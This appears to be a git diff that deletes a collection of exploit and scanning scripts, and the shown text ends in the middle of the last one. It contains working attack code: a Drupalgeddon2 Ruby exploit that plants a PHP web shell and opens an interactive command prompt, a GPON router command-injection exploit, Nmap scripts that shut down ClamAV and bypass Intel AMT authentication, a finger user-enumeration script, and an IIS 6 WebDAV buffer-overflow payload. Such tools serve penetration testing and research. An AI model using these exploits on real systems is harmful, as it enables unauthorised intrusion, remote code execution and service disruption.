-- The command &apos;SCAN&apos; &#xa;may be used to enumerate system files and
-- the command &apos;SHUTDOWN&apos; shut downs the &#xa;service.
-- This vulnerability was discovered by Alejandro Hernandez (nitr0us).&#xa;</elem>
-- </table>
-- <table key="dates">
-- <table key="disclosure">
-- <elem key="year">2016</elem>
-- <elem key="day">8</elem>
-- <elem key="month">06</elem>
-- </table>
-- </table>
-- <elem key="disclosure">2016-06-8</elem>
-- <table key="extra_info">
-- <elem>SCAN command is enabled.</elem>
-- </table>
-- <table key="refs">
-- <elem>https://bugzilla.clamav.net/show_bug.cgi?id=11585</elem>
-- <elem>https://twitter.com/nitr0usmx/status/740673507684679680</elem>
-- </table>
-- </table>
--
-- @args clamav-exec.cmd Command to execute. Option: scan and shutdown
-- @args clamav-exec.scandb Database to file list.
---
author = "Paulino Calderon <calderon()websec.mx>"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"exploit", "vuln"}
portrule = shortport.port_or_service{3310, "clam"}
local function shutdown(host, port)
local s = nmap.new_socket()
local status, err = s:connect(host, port)
if not status then
stdnse.debug1("Failed to connect")
return nil
end
status, err = s:send("SHUTDOWN")
if not status then
stdnse.debug1("Failed to send SHUTDOWN command")
return nil
end
return true
end
---
-- scan(host, port, file)
-- Sends SCAN %FILE command to clamav.
-- If no file is specified, we query a non existing file to check the response.
--
local function scan(host, port, file)
local data
local s = nmap.new_socket()
local status, err = s:connect(host, port)
if not status then
stdnse.debug1("Failed to connect")
return nil
end
if not file then
status, err = s:send("SCAN /trinity/loves/nmap")
if not status then
stdnse.debug1("Failed to send SCAN command")
return nil
end
status, data = s:receive()
if status and data:match("No such file") then
stdnse.debug1("SCAN command enabled")
return true, nil
end
else
status, err = s:send(string.format("SCAN %s", file))
if not status then
stdnse.debug1("Failed to send 'SCAN %s' command", file)
return nil
end
status, data = s:receive()
if status then
if data:match("OK") then
stdnse.debug1("File '%s' exists", file)
return true, true
else
stdnse.debug1("File '%s' does not exists", file)
return true, nil
end
end
end
return nil
end
local function check_clam(host, port)
local s = nmap.new_socket()
local status, err = s:connect(host, port)
if not status then
stdnse.debug1("Failed to connect")
return nil
end
status, err = s:send("PING")
if not status then
stdnse.debug1("Failed to send PING command")
return nil
end
local data
status, data = s:receive()
if status and data:match("PONG") then
stdnse.debug1("PONG response received")
return true
end
return nil
end
action = function(host, port)
local cmd = stdnse.get_script_args(SCRIPT_NAME..".cmd") or nil
local scandb = stdnse.get_script_args(SCRIPT_NAME..".scandb") or nil
if cmd == "scan" and not scandb then
return "The argument 'scandb' must be set if we are using the command 'SCAN'"
end
--Check the service and update the port table
local clamchk = check_clam(host, port)
if clamchk then
stdnse.debug1("ClamAV daemon found")
port.version.name = "clam"
port.version.product = "ClamAV"
nmap.set_port_version(host, port)
end
local vuln = {
title = 'ClamAV Remote Command Execution',
state = vulns.STATE.NOT_VULN,
description = [[
ClamAV 0.99.2, and possibly other previous versions, allow the execution of the
clamav commands SCAN and SHUTDOWN without authentication. The command 'SCAN'
may be used to enumerate system files and the command 'SHUTDOWN' shut downs the
service. This vulnerability was discovered by Alejandro Hernandez (nitr0us).
]],
references = {
'https://bugzilla.clamav.net/show_bug.cgi?id=11585',
'https://twitter.com/nitr0usmx/status/740673507684679680'
},
dates = {
disclosure = {year = '2016', month = '06', day = '8'},
},
}
local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
local status, files = nil
if cmd == "scan" then
local file = io.open(scandb, "r")
if not file then
stdnse.debug1("Couldn't open file '%s'", scandb)
return nil
end
local files = {}
local exists
while true do
local db_line = file:read()
if not db_line then
break
end
status, exists = scan(host, port, db_line)
if status and exists then
table.insert(files, string.format("%s - FOUND!", db_line))
end
end
if #files > 0 then
vuln.extra_info = stdnse.format_output(true, files)
vuln.state = vulns.STATE.VULN
end
elseif cmd == "shutdown" then
status = shutdown(host, port)
if status then
vuln.extra_info = "SHUTDOWN command sent succesfully."
vuln.state = vulns.STATE.VULN
end
else
status, files = scan(host, port, nil)
if status then
vuln.extra_info = "SCAN command is enabled."
vuln.state = vulns.STATE.VULN
end
end
return vuln_report:make_output(vuln)
end

Binary file not shown.

View File

@ -1,364 +0,0 @@
#!/usr/bin/env ruby
#
# [CVE-2018-7600] Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' (SA-CORE-2018-002) ~ https://github.com/dreadlocked/Drupalgeddon2/
#
# Authors:
# - Hans Topo ~ https://github.com/dreadlocked // https://twitter.com/_dreadlocked
# - g0tmi1k ~ https://blog.g0tmi1k.com/ // https://twitter.com/g0tmi1k
#
require "base64"
require "json"
require "net/http"
require "openssl"
require "readline"
# Settings - Proxy information (nil to disable)
proxy_addr = nil
proxy_port = 8080
# Settings - General
$useragent = "drupalgeddon2"
webshell = "s.php"
writeshell = true
# Settings - Payload (we could just be happy without this, but we can do better!)
bashcmd = "<?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }"
bashcmd = "echo " + Base64.strict_encode64(bashcmd) + " | base64 -d"
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Function http_request <url> [type] [data]
def http_request(url, type="post", payload="")
uri = URI(url)
request = type =~ /get/? Net::HTTP::Get.new(uri.request_uri) : Net::HTTP::Post.new(uri.request_uri)
request.initialize_http_header({"User-Agent" => $useragent})
request.body = payload
return $http.request(request)
end
# Function gen_evil_url <cmd> [shell]
def gen_evil_url(evil, shell=false)
# PHP function to use (don't forget about disabled functions...)
#phpfunction = $drupalverion.start_with?("8")? "exec" : "passthru"
phpfunction = "passthru"
#puts "[i] PHP cmd: #{phpfunction}" if shell
puts "[i] Payload: #{evil}" if not shell
## Check the version to match the payload
# Vulnerable Parameters: #access_callback / #lazy_builder / #pre_render / #post_render
if $drupalverion.start_with?("8")
# Method #1 - Drupal 8, mail, #post_render - response is 200
url = $target + "user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
payload = "form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=" + phpfunction + "&mail[a][#type]=markup&mail[a][#markup]=" + evil
# Method #2 - Drupal 8, timezone, #lazy_builder - response is 500 & blind (will need to disable target check for this to work!)
#url = $target + "user/register%3Felement_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
#payload = "form_id=user_register_form&_drupal_ajax=1&timezone[a][#lazy_builder][]=exec&timezone[a][#lazy_builder][][]=" + evil
elsif $drupalverion.start_with?("7")
# Method #3 - Drupal 7, name, #post_render - response is 200
url = $target + "?q=user/password&name[%23post_render][]=" + phpfunction + "&name[%23type]=markup&name[%23markup]=" + evil
payload = "form_id=user_pass&_triggering_element_name=name"
else
puts "[!] Unsupported Drupal version"
exit
end
# Drupal v7.x needs an extra value from a form
if $drupalverion.start_with?("7")
response = http_request(url, "post", payload)
form_build_id = response.body.match(/input type="hidden" name="form_build_id" value="(.*)"/).to_s().slice(/value="(.*)"/, 1).to_s.strip
puts "[!] WARNING: Didn't detect form_build_id" if form_build_id.empty?
url = $target + "?q=file/ajax/name/%23value/" + form_build_id
payload = "form_build_id=" + form_build_id
end
return url, payload
end
# Function clean_result <input>
def clean_result(input)
#result = JSON.pretty_generate(JSON[response.body])
#result = $drupalverion.start_with?("8")? JSON.parse(input)[0]["data"] : input
result = input
#result.slice!(/^\[{"command":".*}\]$/)
result.slice!(/\[{"command":".*}\]$/)
return result
end
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Quick how to use
if ARGV.empty?
puts "Usage: ruby drupalggedon2.rb <target>"
puts " ruby drupalgeddon2.rb https://example.com"
exit
end
# Read in values
$target = ARGV[0]
# Check input for protocol
if not $target.start_with?("http")
$target = "http://#{$target}"
end
# Check input for the end
if not $target.end_with?("/")
$target += "/"
end
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Banner
puts "[*] --==[::#Drupalggedon2::]==--"
puts "-"*80
puts "[i] Target : #{$target}"
puts "[i] Proxy : #{proxy_addr}:#{proxy_port}" if not proxy_addr.nil?
puts "[i] Write? : Skipping writing web shell" if not writeshell
puts "-"*80
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Setup connection
uri = URI($target)
$http = Net::HTTP.new(uri.host, uri.port, proxy_addr, proxy_port)
# Use SSL/TLS if needed
if uri.scheme == "https"
$http.use_ssl = true
$http.verify_mode = OpenSSL::SSL::VERIFY_NONE
end
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Try and get version
$drupalverion = nil
# Possible URLs
url = [
# Drupal 6 / 7 / 8
$target + "CHANGELOG.txt",
$target + "core/CHANGELOG.txt",
# Drupal 6+7 / 8
$target + "includes/bootstrap.inc",
$target + "core/includes/bootstrap.inc",
# Drupal 6 / 7 / 8
$target + "includes/database.inc",
#$target + "includes/database/database.inc",
#$target + "core/includes/database.inc",
]
# Check all
url.each do|uri|
# Check response
response = http_request(uri, "get")
if response.code == "200"
puts "[+] Found : #{uri} (HTTP Response: #{response.code})"
# Patched already?
puts "[!] WARNING: Might be patched! Found SA-CORE-2018-002: #{url}" if response.body.include? "SA-CORE-2018-002"
# Try and get version from the file contents
$drupalverion = response.body.match(/Drupal (.*),/).to_s.slice(/Drupal (.*),/, 1).to_s.strip
# If not, try and get it from the URL (In theory, these will never trigger/work as they will be HTTP 403)
$drupalverion = uri.match(/includes\/database.inc/)? "6.x" : nil if $drupalverion.empty?
$drupalverion = uri.match(/core/)? "8.x" : "7.x" if $drupalverion.nil?
# Done!
break
elsif response.code == "403"
puts "[+] Found : #{uri} (HTTP Response: #{response.code})"
# Get version from URL
$drupalverion = uri.match(/includes\/database.inc/)? "6.x" : nil
$drupalverion = uri.match(/core/)? "8.x" : "7.x" if $drupalverion.nil?
else
puts "[!] MISSING: #{uri} (HTTP Response: #{response.code})"
end
end
# Feedback
if $drupalverion
status = $drupalverion.end_with?("x")? "?" : "!"
puts "[+] Drupal#{status}: v#{$drupalverion}"
else
puts "[!] Didn't detect Drupal version"
exit
end
if not $drupalverion.start_with?("8") and not $drupalverion.start_with?("7")
puts "[!] Unsupported Drupal version"
exit
end
puts "-"*80
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Make a request, testing code execution
puts "[*] Testing: Code Execution"
# Generate a random string to see if we can echo it
random = (0...8).map { (65 + rand(26)).chr }.join
url, payload = gen_evil_url("echo #{random}")
response = http_request(url, "post", payload)
if response.code == "200" and not response.body.empty?
result = clean_result(response.body)
if not result.empty?
puts "[+] Result : #{result}"
puts response.body.match(/#{random}/)? "[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!" : "[!] WARNING: Target might to be exploitable [1]... Detected output, but didn't match expected result"
else
puts "[!] WARNING: Target might to be exploitable [2]... Didn't detect any output (disabled PHP function?)"
end
else
puts "[!] Target is NOT exploitable ~ HTTP Response: #{response.code}"
exit
end
puts "-"*80
# Location of web shell & used to signal if using PHP shell
webshellpath = nil
prompt = "drupalgeddon2"
# Possibles paths to try
paths = [
# Web root
"",
# Required for setup
"sites/default/",
"sites/default/files/",
# They did something "wrong", chmod -R 0777 .
#"core/",
]
# Check all (if doing web shell)
paths.each do|path|
folder = path.empty? ? "./" : path
puts "[*] Testing: Writing To Web Root (#{folder})"
# Merge locations
webshellpath = "#{path}#{webshell}"
# Final command to execute
cmd = "#{bashcmd} | tee #{webshellpath}"
# By default, Drupal v7.x disables the PHP engine entirely in: ./sites/default/files/.htaccess
# ...however Drupal v8.x disables the PHP engine using: ./.htaccess
if path == "sites/default/files/"
puts "[i] Moving : ./sites/default/files/.htaccess"
cmd = "mv -f #{path}.htaccess #{path}.htaccess-bak; #{cmd}"
end
# Generate evil URLs
url, payload = gen_evil_url(cmd)
# Make the request
response = http_request(url, "post", payload)
# Check result
if response.code == "200" and not response.body.empty?
# Feedback
result = clean_result(response.body)
puts "[+] Result : #{result}" if not response.body.empty?
# Test to see if backdoor is there (if we managed to write it)
response = http_request("#{$target}#{webshellpath}", "post", "c=hostname")
if response.code == "200" and not response.body.empty?
puts "[+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!!"
break
elsif response.code == "403"
puts "[!] Target is NOT exploitable for some reason [1] (HTTP Response: #{response.code})... May not be able to execute PHP from here?"
elsif response.code == "404"
puts "[!] Target is NOT exploitable for some reason [2] (HTTP Response: #{response.code})... Might not have write access?"
elsif response.body.empty?
puts "[!] Target is NOT exploitable for some reason [3] (HTTP Response: #{response.code})... Got an empty response back"
else
puts "[!] Target is NOT exploitable for some reason [4] (HTTP Response: #{response.code})"
end
elsif response.code == "403"
puts "[!] Target is NOT exploitable for some reason [5] (HTTP Response: #{response.code})... May not be able to execute PHP from here?"
elsif response.code == "404"
puts "[!] Target is NOT exploitable for some reason [6] (HTTP Response: #{response.code})... Might not have write access?"
elsif response.body.empty?
puts "[!] Target is NOT exploitable for some reason [7] (HTTP Response: #{response.code}))... Got an empty response back"
else
puts "[!] Target is NOT exploitable for some reason [8] (HTTP Response: #{response.code})"
end
webshellpath = nil
puts "- "*40 if path != paths.last
end if writeshell
# If a web path was set, we exploited using PHP!
if webshellpath
# Get hostname for the prompt
prompt = response.body.to_s.strip
# Feedback
puts "-"*80
puts "[i] Fake shell: curl '#{$target}#{webshellpath}' -d 'c=hostname'"
# Should we be trying to call commands via PHP?
elsif writeshell
puts "[!] FAILED: Couldn't find writeable web path"
puts "-"*80
puts "[*] Dropping back direct commands"
end
# Stop any CTRL + C action ;)
trap("INT", "SIG_IGN")
# Forever loop
loop do
# Default value
result = "~ERROR~"
# Get input
command = Readline.readline("#{prompt}>> ", true).to_s
# Exit
break if command =~ /exit/
# Blank link?
next if command.empty?
# If PHP shell
if webshellpath
# Send request
result = http_request("#{$target}#{webshell}", "post", "c=#{command}").body
# Direct commands
else
url, payload = gen_evil_url(command, true)
response = http_request(url, "post", payload)
# Check result
if response.code == "200" and not response.body.empty?
result = clean_result(response.body)
end
end
# Feedback
puts result
end

View File

@ -1,30 +0,0 @@
#!/bin/bash
# fingertool - This script will enumerate users using finger
# SECFORCE - Antonio Quina
if [ $# -eq 0 ]
then
echo "Usage: $0 <IP> [<WORDLIST>]"
echo "eg: $0 10.10.10.10 users.txt"
exit
else
IP="$1"
fi
if [ "$2" == "" ]
then
WORDLIST="/usr/share/metasploit-framework/data/wordlists/unix_users.txt"
else
WORDLIST="$2"
fi
for username in $(cat $WORDLIST | sort -u| uniq)
do output=$(finger -l $username@$IP)
if [[ $output == *"Directory"* ]]
then
echo "Found user: $username"
fi
done
echo "Finished!"

View File

@ -1,78 +0,0 @@
#!/usr/bin/env python
import sys
import requests
import time
import urllib2
import re
import ssl
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
def banner():
ascii_art = """
________________________________________________________________
[*] GPON Remote Code Execution (CVE-2018-10562) [*]
________________________________________________________________
Coded by F3D
Twitter: @f3d_0x0
Medium: medium.com/@0xf3d
________________________________________________________________
"""
print ascii_art
def retrieve_results(target, command):
try:
fp = urllib2.urlopen(target + '/diag.html?images/', context=ctx)
for line in fp.readlines():
if 'diag_result = \"Can\'t resolv hostname for' in line:
start = '['
end = ';' + command +']'
res = str(line[line.find(start)+len(start):line.rfind(end)])
return res.replace('\\n', '\n')
except Exception as e:
print "[DEBUG] " + str(e) + '\n'
print "[*] An error occured while retriving the result"
def send_command(url_bypass, payload):
print "[*] Injecting command.."
try:
req = requests.Request('POST', url_bypass, data=payload)
prepared = req.prepare()
s = requests.Session()
s.send(prepared)
except Exception as e:
pass
if __name__ == "__main__":
try:
banner()
# Getting the parameters
domain = sys.argv[1]
command = sys.argv[2]
# Create url and payload
url_bypass = domain + '/GponForm/diag_Form?images/'
payload = 'XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`' + command + '`;' + command + '&ipv=0'
# Injecting the command
send_command(url_bypass, payload)
print "[*] Waiting for results..zZz.."
time.sleep(3)
print "[*] Getting the results.."
# Retrieve the output
out = retrieve_results(domain, command)
print ""
print out
print ""
except Exception as e:
print "[DEBUG] " + str(e) + '\n'
print "[ERROR] Usage: python gpon_rce.py TARGET_URL COMMAND"
print "[ERROR] e.g. : python gpon_rce.py http://192.168.1.15 \'id\'\n"

View File

@ -1,94 +0,0 @@
description = [[
Detects if Intel Active Management Technology is vulnerable to the INTEL-SA-00075 authentication bypass
vulnerability by attempting to perform digest authentication with a blank response parameter.
]]
local http = require "http"
local shortport = require "shortport"
local vulns = require "vulns"
local stdnse = require "stdnse"
---
-- @usage
-- nmap -p 16992 --script http-vuln-INTEL-SA-00075 <target>
--
-- @output
-- PORT STATE SERVICE REASON
-- 16992/tcp open amt-soap-http syn-ack
-- | http-vuln-INTEL-SA-00075:
-- | VULNERABLE:
-- | Intel Active Management Technology INTEL-SA-00075 Authentication Bypass
-- | State: VULNERABLE
-- | IDs: CVE:CVE-2017-5689 BID:98269
-- | Risk factor: High CVSSv2: 10.0 (HIGH) (AV:N/AC:L/AU:N/C:C/I:C/A:C)
-- | Intel Active Management Technology is vulnerable to an authentication bypass that
-- | can be exploited by performing digest authentication and sending a blank response
-- | digest parameter.
-- |
-- | Disclosure date: 2017-05-01
-- | References:
-- | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5689
-- | https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00075&languageid=en-fr
-- | http://www.securityfocus.com/bid/98269
-- | https://www.embedi.com/files/white-papers/Silent-Bob-is-Silent.pdf
-- | https://www.embedi.com/news/what-you-need-know-about-intel-amt-vulnerability
-- |_ https://www.tenable.com/blog/rediscovering-the-intel-amt-vulnerability
author = "Andrew Orr"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = { "vuln", "auth", "exploit" }
portrule = shortport.portnumber({623, 664, 16992, 16993, 16994, 16995})
action = function(host, port)
local vuln = {
title = "Intel Active Management Technology INTEL-SA-00075 Authentication Bypass",
state = vulns.STATE.NOT_VULN,
risk_factor = "High",
scores = {
CVSSv2 = "10.0 (HIGH) (AV:N/AC:L/AU:N/C:C/I:C/A:C)",
},
description = [[
Intel Active Management Technology is vulnerable to an authentication bypass that
can be exploited by performing digest authentication and sending a blank response
digest parameter.
]],
IDS = {
CVE = "CVE-2017-5689",
BID = "98269"
},
references = {
'https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00075&languageid=en-fr',
'https://www.embedi.com/news/what-you-need-know-about-intel-amt-vulnerability',
'https://www.embedi.com/files/white-papers/Silent-Bob-is-Silent.pdf',
'https://www.tenable.com/blog/rediscovering-the-intel-amt-vulnerability'
},
dates = {
disclosure = { year = '2017', month = '05', day = '01' }
}
}
local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
local response = http.get(host, port, '/index.htm')
if response.header['server']:find('Intel(R) Active Management Technology', 1, true) and response.status == 401 then
local www_authenticate = http.parse_www_authenticate(response.header['www-authenticate'])
auth_header = 'Digest ' ..
'username="admin", ' ..
'realm="' .. www_authenticate[1]['params']['realm'] .. '", ' ..
'nonce="' .. www_authenticate[1]['params']['nonce'] .. '", ' ..
'uri="/index.htm", ' ..
'cnonce="' .. stdnse.generate_random_string(10) .. '", ' ..
'nc=1, ' ..
'qop="auth", ' ..
'response=""'
local opt = { header = { ['Authorization'] = auth_header } }
local response2 = http.get(host, port, '/index.htm', opt)
if response2.status == 200 then
vuln.state = vulns.STATE.VULN
end
end
return vuln_report:make_output(vuln)
end

View File

@ -1,181 +0,0 @@
local nmap = require "nmap"
local string = require "string"
local shortport = require "shortport"
local vulns = require "vulns"
-- NSE Buffer Overflow vulnerability in IIS
---
-- @usage
-- ./nmap iis-buffer-overflow <target>
--
-- @output
-- PORT STATE SERVICE
-- 80/tcp open http
-- | iis-buffer-overflow:
-- | VULNERABLE: Buffer Overflow in IIS 6 and Windows Server 2003 R2
-- | State: LIKELY_VULNERABLE
-- | Risk factor: High CVSS: 10.0
-- | Description:
-- | Buffer overflow in the ScStoragePathFromUrl function in the WebDAV
-- | service in Internet Information Services (IIS) 6.0
-- | in Microsoft Windows Server 2003 R2 allows remote attackers to execute
-- | arbitrary code via a long header beginning with "If: <http://" in a
-- | PROPFIND request, as exploited in the wild in July or August 2016.
-- |
-- | Original exploit by Zhiniang Peng and Chen Wu.
-- |
-- | References:
-- | https://github.com/edwardz246003/IIS_exploit,
-- |_ https://0patch.blogspot.in/2017/03/0patching-immortal-cve-2017-7269.html
--
author = {
"Zhiniang Peng", -- Original author
"Chen Wu", -- Original author
"Rewanth Cool" -- NSE script author
}
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"exploit", "vuln", "intrusive"}
portrule = shortport.portnumber(80, "tcp")
action = function(host, port)
local socket, response, try, catch, payload, shellcode, vulnerable_name
local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
local vuln = {
title = 'Buffer Overflow in IIS 6 and Windows Server 2003 R2',
state = vulns.STATE.NOT_VULN,
risk_factor = "High",
description = [[
Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0
in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning
with "If: <http://" in a PROPFIND request, as exploited in the wild in July or August 2016.
Original exploit by Zhiniang Peng and Chen Wu.
]],
IDS = {
CVE = 'CVE-2017-7269'
},
scores = {
CVSS = '10.0'
},
references = {
'https://github.com/edwardz246003/IIS_exploit',
'https://0patch.blogspot.in/2017/03/0patching-immortal-cve-2017-7269.html'
},
dates = {
disclosure = {year = '2017', month = '03', day = '26'},
}
}
-- If domain name doesn't exist this line of code takes ip into consideration
vulnerable_name = host.targetname or host.ip
socket = nmap.new_socket()
catch = function()
socket:close()
end
try = nmap.new_try(catch)
try(socket:connect(host, port))
-- Crafting the payload by parts
-- Crafting the request with HTTP PROPFIND method
payload = 'PROPFIND / HTTP/1.1\r\nHost: ' .. vulnerable_name .. '\r\nContent-Length: 0\r\n'
payload = payload .. 'If: <http://' .. vulnerable_name .. '/aaaaaaa'
-- Random text added to payload (Can be modified only for experimental purposes)
payload = payload .. '\xe6\xbd\xa8\xe7\xa1\xa3\xe7\x9d\xa1\xe7\x84\xb3\xe6\xa4\xb6\xe4\x9d\xb2\xe7\xa8\xb9\xe4\xad\xb7\xe4\xbd'
payload = payload .. '\xb0\xe7\x95\x93\xe7\xa9\x8f\xe4\xa1\xa8\xe5\x99\xa3\xe6\xb5\x94\xe6\xa1\x85\xe3\xa5\x93\xe5\x81\xac\xe5'
payload = payload .. '\x95\xa7\xe6\x9d\xa3\xe3\x8d\xa4\xe4\x98\xb0\xe7\xa1\x85\xe6\xa5\x92\xe5\x90\xb1\xe4\xb1\x98\xe6\xa9\x91'
payload = payload .. '\xe7\x89\x81\xe4\x88\xb1\xe7\x80\xb5\xe5\xa1\x90\xe3\x99\xa4\xe6\xb1\x87\xe3\x94\xb9\xe5\x91\xaa\xe5\x80'
payload = payload .. '\xb4\xe5\x91\x83\xe7\x9d\x92\xe5\x81\xa1\xe3\x88\xb2\xe6\xb5\x8b\xe6\xb0\xb4\xe3\x89\x87\xe6\x89\x81\xe3'
payload = payload .. '\x9d\x8d\xe5\x85\xa1\xe5\xa1\xa2\xe4\x9d\xb3\xe5\x89\x90\xe3\x99\xb0\xe7\x95\x84\xe6\xa1\xaa\xe3\x8d\xb4'
payload = payload .. '\xe4\xb9\x8a\xe7\xa1\xab\xe4\xa5\xb6\xe4\xb9\xb3\xe4\xb1\xaa\xe5\x9d\xba\xe6\xbd\xb1\xe5\xa1\x8a\xe3\x88'
payload = payload .. '\xb0\xe3\x9d\xae\xe4\xad\x89\xe5\x89\x8d\xe4\xa1\xa3\xe6\xbd\x8c\xe7\x95\x96\xe7\x95\xb5\xe6\x99\xaf\xe7'
payload = payload .. '\x99\xa8\xe4\x91\x8d\xe5\x81\xb0\xe7\xa8\xb6\xe6\x89\x8b\xe6\x95\x97\xe7\x95\x90\xe6\xa9\xb2\xe7\xa9\xab'
payload = payload .. '\xe7\x9d\xa2\xe7\x99\x98\xe6\x89\x88\xe6\x94\xb1\xe3\x81\x94\xe6\xb1\xb9\xe5\x81\x8a\xe5\x91\xa2\xe5\x80'
payload = payload .. '\xb3\xe3\x95\xb7'
-- Main payload (Do not edit this part)
payload = payload .. '\xe6\xa9\xb7\xe4\x85\x84\xe3\x8c\xb4\xe6\x91\xb6\xe4\xb5\x86\xe5\x99\x94\xe4\x9d\xac\xe6'
payload = payload .. '\x95\x83\xe7\x98\xb2\xe7\x89\xb8\xe5\x9d\xa9\xe4\x8c\xb8\xe6\x89\xb2\xe5\xa8\xb0\xe5\xa4\xb8\xe5\x91\x88'
payload = payload .. '\xc8\x82\xc8\x82\xe1\x8b\x80\xe6\xa0\x83\xe6\xb1\x84\xe5\x89\x96\xe4\xac\xb7\xe6\xb1\xad\xe4\xbd\x98\xe5'
payload = payload .. '\xa1\x9a\xe7\xa5\x90\xe4\xa5\xaa\xe5\xa1\x8f\xe4\xa9\x92\xe4\x85\x90\xe6\x99\x8d\xe1\x8f\x80\xe6\xa0\x83'
payload = payload .. '\xe4\xa0\xb4\xe6\x94\xb1\xe6\xbd\x83\xe6\xb9\xa6\xe7\x91\x81\xe4\x8d\xac\xe1\x8f\x80\xe6\xa0\x83\xe5\x8d'
payload = payload .. '\x83\xe6\xa9\x81\xe7\x81\x92\xe3\x8c\xb0\xe5\xa1\xa6\xe4\x89\x8c\xe7\x81\x8b\xe6\x8d\x86\xe5\x85\xb3\xe7'
payload = payload .. '\xa5\x81\xe7\xa9\x90\xe4\xa9\xac'
payload = payload .. '>'
payload = payload .. ' (Not <locktoken:write1>) <http://' .. vulnerable_name .. '/bbbbbbb'
-- Random text added to payload (Can be modified only for experimental purposes)
payload = payload .. '\xe7\xa5\x88\xe6\x85\xb5\xe4\xbd\x83\xe6\xbd\xa7\xe6\xad\xaf\xe4\xa1\x85\xe3\x99\x86\xe6'
payload = payload .. '\x9d\xb5\xe4\x90\xb3\xe3\xa1\xb1\xe5\x9d\xa5\xe5\xa9\xa2\xe5\x90\xb5\xe5\x99\xa1\xe6\xa5\x92\xe6\xa9\x93\xe5'
payload = payload .. '\x85\x97\xe3\xa1\x8e\xe5\xa5\x88\xe6\x8d\x95\xe4\xa5\xb1\xe4\x8d\xa4\xe6\x91\xb2\xe3\x91\xa8\xe4\x9d\x98\xe7'
payload = payload .. '\x85\xb9\xe3\x8d\xab\xe6\xad\x95\xe6\xb5\x88\xe5\x81\x8f\xe7\xa9\x86\xe3\x91\xb1\xe6\xbd\x94\xe7\x91\x83\xe5'
payload = payload .. '\xa5\x96\xe6\xbd\xaf\xe7\x8d\x81\xe3\x91\x97\xe6\x85\xa8\xe7\xa9\xb2\xe3\x9d\x85\xe4\xb5\x89\xe5\x9d\x8e\xe5'
payload = payload .. '\x91\x88\xe4\xb0\xb8\xe3\x99\xba\xe3\x95\xb2\xe6\x89\xa6\xe6\xb9\x83\xe4\xa1\xad\xe3\x95\x88\xe6\x85\xb7\xe4'
payload = payload .. '\xb5\x9a\xe6\x85\xb4\xe4\x84\xb3\xe4\x8d\xa5\xe5\x89\xb2\xe6\xb5\xa9\xe3\x99\xb1\xe4\xb9\xa4\xe6\xb8\xb9\xe6'
payload = payload .. '\x8d\x93\xe6\xad\xa4\xe5\x85\x86\xe4\xbc\xb0\xe7\xa1\xaf\xe7\x89\x93\xe6\x9d\x90\xe4\x95\x93\xe7\xa9\xa3\xe7'
payload = payload .. '\x84\xb9\xe4\xbd\x93\xe4\x91\x96\xe6\xbc\xb6\xe7\x8d\xb9\xe6\xa1\xb7\xe7\xa9\x96\xe6\x85\x8a\xe3\xa5\x85\xe3'
payload = payload .. '\x98\xb9\xe6\xb0\xb9\xe4\x94\xb1\xe3\x91\xb2\xe5\x8d\xa5\xe5\xa1\x8a\xe4\x91\x8e\xe7\xa9\x84\xe6\xb0\xb5'
-- Main payload (Do not edit this part)
payload = payload .. '\xe5\xa9\x96\xe6\x89\x81\xe6\xb9\xb2\xe6\x98\xb1\xe5\xa5\x99\xe5\x90\xb3\xe3\x85\x82\xe5\xa1\xa5\xe5\xa5\x81\xe7'
payload = payload .. '\x85\x90\xe3\x80\xb6\xe5\x9d\xb7\xe4\x91\x97\xe5\x8d\xa1\xe1\x8f\x80\xe6\xa0\x83\xe6\xb9\x8f\xe6\xa0\x80\xe6'
payload = payload .. '\xb9\x8f\xe6\xa0\x80\xe4\x89\x87\xe7\x99\xaa\xe1\x8f\x80\xe6\xa0\x83\xe4\x89\x97\xe4\xbd\xb4\xe5\xa5\x87\xe5'
payload = payload .. '\x88\xb4\xe4\xad\xa6\xe4\xad\x82\xe7\x91\xa4\xe7\xa1\xaf\xe6\x82\x82\xe6\xa0\x81\xe5\x84\xb5\xe7\x89\xba\xe7'
payload = payload .. '\x91\xba\xe4\xb5\x87\xe4\x91\x99\xe5\x9d\x97\xeb\x84\x93\xe6\xa0\x80\xe3\x85\xb6\xe6\xb9\xaf\xe2\x93\xa3\xe6'
payload = payload .. '\xa0\x81\xe1\x91\xa0\xe6\xa0\x83\xcc\x80\xe7\xbf\xbe\xef\xbf\xbf\xef\xbf\xbf\xe1\x8f\x80\xe6\xa0\x83\xd1\xae'
payload = payload .. '\xe6\xa0\x83\xe7\x85\xae\xe7\x91\xb0\xe1\x90\xb4\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81\xe9\x8e\x91\xe6\xa0\x80'
